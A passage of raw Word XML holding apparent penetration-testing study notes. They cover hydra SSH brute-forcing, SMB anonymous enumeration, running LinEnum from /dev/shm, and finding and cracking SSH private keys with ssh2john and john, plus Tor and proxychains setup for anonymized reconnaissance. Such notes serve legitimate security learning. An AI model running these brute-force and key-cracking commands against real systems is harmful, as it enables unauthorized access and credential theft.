        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>hydra -l &lt;username&gt; -P &lt;path to list&gt; ssh://&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2054920D" w14:textId="187BECFA" w:rsidR="00574F80" w:rsidRPr="0084205E" w:rsidRDefault="00574F80" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> anonymous login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653EE492" w14:textId="018B81AF" w:rsidR="00574F80" w:rsidRPr="0084205E" w:rsidRDefault="00574F80" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if enum4linux reveal anon availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFACCE5" w14:textId="5ED6AFE9" w:rsidR="00574F80" w:rsidRPr="0084205E" w:rsidRDefault="00574F80" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2768DD" w14:textId="66EA545D" w:rsidR="00B770A6" w:rsidRPr="0084205E" w:rsidRDefault="00B770A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63F4C28C" w14:textId="65EF0DB8" w:rsidR="00574F80" w:rsidRPr="0084205E" w:rsidRDefault="00455425" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">if you </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EEE4382" w14:textId="4D3BE59F" w:rsidR="00455425" w:rsidRPr="0084205E" w:rsidRDefault="00455425" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A034E5" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> into dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A034E5" w:rsidRPr="0084205E">
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DE4D670" w14:textId="649545EC" w:rsidR="00A034E5" w:rsidRPr="0084205E" w:rsidRDefault="00A034E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D5E82" w14:textId="0B8EC37E" w:rsidR="00A034E5" w:rsidRPr="0084205E" w:rsidRDefault="00A034E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>./LinEnum.sh | tee &lt;outputfile.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE5FF5" w14:textId="547A0EC7" w:rsidR="00B770A6" w:rsidRPr="0084205E" w:rsidRDefault="00B770A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinPeas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6995C294" w14:textId="5C7FD3CD" w:rsidR="00B770A6" w:rsidRPr="0084205E" w:rsidRDefault="00B770A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerate directories with ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EED4A3F" w14:textId="1F9BCC02" w:rsidR="00B770A6" w:rsidRPr="0084205E" w:rsidRDefault="00B770A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>search for .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE1E4D" w14:textId="08C4E8B4" w:rsidR="00B770A6" w:rsidRPr="0084205E" w:rsidRDefault="00B770A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>save private keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0520098D" w14:textId="0B7F8239" w:rsidR="00B770A6" w:rsidRPr="0084205E" w:rsidRDefault="00B770A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">mark as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 600 for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B37ACE" w14:textId="14EA05E2" w:rsidR="00B770A6" w:rsidRPr="0084205E" w:rsidRDefault="00B770A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>passphrase protection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F05D08" w14:textId="0D9B6E1E" w:rsidR="00B770A6" w:rsidRPr="0084205E" w:rsidRDefault="00B770A6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh2john.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDC2228" w14:textId="1AC421A6" w:rsidR="00B770A6" w:rsidRPr="0084205E" w:rsidRDefault="00FA385C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">python3 /usr/share/john/ssh2john.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa_kay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &gt; id_rsa_kay_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714BA8AE" w14:textId="73FBA286" w:rsidR="00FA385C" w:rsidRPr="0084205E" w:rsidRDefault="00FA385C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john id_rsa_kay_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1796D748" w14:textId="0C43008B" w:rsidR="00FA385C" w:rsidRPr="0084205E" w:rsidRDefault="00FA385C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Login and Escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01787F96" w14:textId="5A3FBF67" w:rsidR="00FA385C" w:rsidRPr="0084205E" w:rsidRDefault="00FA385C" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13017957" w14:textId="01741B66" w:rsidR="00FA385C" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4BCAB4" w14:textId="573D2644" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Free and open-source software for enabling anonymous communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF1D8B1" w14:textId="34DE9E4E" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>directs traffic through overlay network consisting of several thousand relays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6BF45F" w14:textId="0A683DAA" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>more difficult to trace user internet activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C125D6D" w14:textId="672A03AF" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">useful in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>blackbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DC447D" w14:textId="408C9D00" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>apt-get install tor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6FE768" w14:textId="3E0A8DD2" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF85A9" w14:textId="3B0718A8" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>service tor status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A49C458" w14:textId="10597ECA" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5461CE4B" w14:textId="39287206" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FAB249F" w14:textId="131F8E04" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>forces TCP connections made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5, or HTTP(S) proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C97D811" w14:textId="1E685A03" w:rsidR="00F0131D" w:rsidRPr="0084205E" w:rsidRDefault="00F0131D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">widely used by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pentesters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> during reconnaissance stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2451E2E8" w14:textId="7C69A964" w:rsidR="005B3878" w:rsidRPr="0084205E" w:rsidRDefault="005B3878" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">such as with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C946E1D" w14:textId="65974065" w:rsidR="005B3878" w:rsidRPr="0084205E" w:rsidRDefault="005B3878" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="768E6028" w14:textId="2D6FF5D2" w:rsidR="005B3878" w:rsidRPr="0084205E" w:rsidRDefault="005B3878" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>proxychains.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B364EDC" w14:textId="65B5B47D" w:rsidR="005B3878" w:rsidRPr="0084205E" w:rsidRDefault="005B3878" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">uncomment </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dynamic_chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06DA0D1C" w14:textId="15E0047F" w:rsidR="005B3878" w:rsidRPr="0084205E" w:rsidRDefault="005B3878" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">uncomment </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>proxy_dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E192F3D" w14:textId="098C2E0B" w:rsidR="005B3878" w:rsidRPr="0084205E" w:rsidRDefault="005B3878" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">comment </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>strict_chains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61CF1F81" w14:textId="4E18A0EB" w:rsidR="005B3878" w:rsidRPr="0084205E" w:rsidRDefault="005B3878" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>save and exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E22719" w14:textId="3580B076" w:rsidR="005B3878" w:rsidRPr="0084205E" w:rsidRDefault="005B3878" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">start TOR </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE7ACE" w14:textId="3AD83F8F" w:rsidR="005B3878" w:rsidRPr="0084205E" w:rsidRDefault="005B3878" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
